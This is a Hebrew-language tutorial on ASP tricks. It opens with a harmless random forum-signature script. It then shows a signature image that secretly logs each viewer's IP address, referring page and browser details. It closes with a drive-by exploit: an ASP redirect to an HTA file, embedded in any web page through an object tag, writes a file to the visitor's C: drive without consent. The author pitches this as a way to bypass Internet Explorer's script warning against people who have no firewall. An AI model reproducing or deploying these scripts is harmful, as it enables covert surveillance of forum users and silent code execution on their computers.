טיפים וטריקים בASP

הערה: המדריך נכתב בהנחה שיש לכם מעט ידע בASP (למרות שידע קודם אינו ממש הכרחי אבל הוא עוזר)

המטרה: חתימות אקראיות
~~~~~~~~~~~~~~~~~~~~~
מצרכים: חשבון בברינקסטר (או בכל שרת אחר שתומך בASP)
לפחות 2 חתימות שונות שנמצאות על שרת כלשהו ברשת. (ברינקסטר לא טוב למטרה הזו. לייקוס בסדר)

מה עושים?
1. פותחים קובץ טקסט חדש, כותבים בו:
<% Dim pics(2) pics(1)= "http://members.lycos.co.uk/mynick/mysig1.jpg" pics(2)= "http://members.lycos.co.uk/mynick/mysig2.jpg" randomize x=int((2*Rnd)+1) Response.Redirect pics(x) %>
2. שומרים אותו בתור sig.asp ומעלים אותו לשרת הASP שלכם
3. שנו את כתובת החתימה שלכם לכתובת של קובץ הASP שיצרתם והנה, יש לכם חתימה מתחלפת.

מה עשינו?
1. יצרנו מערך pics בעל 2 משתנים (אפשר להוסיף יותר כמובן)
2. המשתנה הראשון מכיל את הכתובת של החתימה הראשונה
3. המשתנה השני מכיל את הכתובת של החתימה השניה
4. הפעלנו פונקציה שמחזירה מספר אקראי בין 1 ל 2
6. נתנו הוראה לשרת להעביר אותנו לכתובת שנמצאת במיקום של המספר האקראי שקיבלנו

המטרה: איסוף נתונים על גולשי הפורום בעזרת החתימה
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
מצרכים: חשבון בברינקסטר (או בכל שרת אחר שתומך בASP ומאפשר כתיבה לקבצים)

מה עושים?
1. פותחים קובץ טקסט חדש, כותבים בו:
<% Set FSO = Server.CreateObject("Scripting.FileSystemObject") Set TextFile = FSO.OpenTextFile(Server.MapPath("log.txt"),1,False) if NOT TextFile.AtEndOfStream Then OldText = TextFile.ReadAll TextFile.Close Set TextFile = FSO.OpenTextFile(Server.MapPath("log.txt"),2,True) TextFile.Write OldText TextFile.Write Request.ServerVariables("REMOTE_ADDR") & vbCrlf TextFile.Write Request.ServerVariables("HTTP_REFERER") & vbCrlf TextFile.Write Request.ServerVariables("HTTP_USER_AGENT") & vbCrlf & "~" & vbCrlf TextFile.Close Set TextFile = Nothing Set FSO = Nothing Response.Redirect "http://members.lycos.co.uk/mynick/mysig.jpg" %>
2. שומרים את קובץ הטקסט בשם log.asp ומעלים אותו לשרת הASP שלכם
3. פותחים קובץ טקסט ריק ושומרים אותו בשם log.txt ומעלים גם אותו לשרת הASP
4. שנו את כתובת החתימה שלכם לכתובת של קובץ הASP שיצרתם.
5. עכשיו, הקובץ log.txt יאסוף את כתובות האייפי ואת פרטי הדפדפן ומערכת ההפעלה של כל מי שיראה את החתימה שלכם בצירוף כתובת הדף בה הוא צפה בחתימה

מה עשינו?
1. פחתנו את הקובץ log.txt לקריאה ושמרנו את התוכן במשתנה OldText
2. פתחנו את הקובץ log.txt לכתיבה (מה שמוחק את כל מה שהיה בפנים) והוספנו לו את מה שנמצא בOldText
3. כתבנו בקובץ את כתובת האייפי של המשתמש ממנו התבצעה הקריאה + ירידת שורה
4. כתבנו את כתובת הדף ממנו התבצעה הקריאה + ירידת שורה
5. כתבנו את את פרטי הדפדפן ומערכת ההפעלה של הגולש שממנו התבצעה הקריאה + ירידת שורה + הסימן ~ + ירידת שורה
6. ביקשנו מהשרת שיעבור לכתובת בה נמצאת החתימה האורגינלית שלנו

המטרה: קובץ HTML שמפעיל VBS ללא אישור המשתמש. (נבדק ופועל בWIN98 , IE6 , הפיירוול מקפיץ אזהרה)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
מצרכים: חשבון בברינקסטר (או בכל שרת אחר שתומך בASP)

מה עושים?
1. פותחים קובץ טקסט חדש, כותבים בו:
<% Response.Redirect "file.hta" %> (כן, כל כך קצר..)
2. שומרים את הקובץ בשם file.asp ומעלים לשרת
3. פותחים קובץ טקסט חדש, כותבים בו:
<html> <body> <script type="text/vbscript"> on error resume next dim fso,file set fso = CreateObject("Scripting.FileSystemObject") file = fso.opentextfile ("c:\vir.vbs",2,true) file.Write "Mooooo" & vbCrlf file.close Set FSO = Nothing </script> </body> </html>
4. שומרים אותו בשם file.hta ומעלים גם אותו לשרת
5. מעתיקים את הקוד הבא ומצרפים אותו לכל קובץ HTML שבא לכם.
<object data="http://wwwxx.brinkster.com/mynick/file.asp"></object>
6. מעלים את קובץ הHTML לכל שרת שבא לכם..
7. ברגע שמישהו יצפה בדף, יקפוץ לו חלון נוסף שיבצע את מה שכתוב בקובץ file.hta (יצירת קובץ בשם vir.vbs שיהיה כתוב בו "Mooooo") העניין הוא,
שבמקום לשלב את הקוד בצורה רגילה בקובץ HTML, מה שהיה גורם להודעה על זה שסקריפט ActiveX שקיים בדף יכול להיות הרסני.
בזכו מה שעשינו, לא תיפתח לו הודעה כזו. במקום זה, הפיירוול יקפוץ לו.
למה זה טוב? להרבה האנשים אין פיירוול, ולכן הם לא יוזהרו בכלל

כמובן שמייקרוסופט הוציאה פאטצ': http://www.microsoft.com/technet/security/bulletin/MS03-032.mspx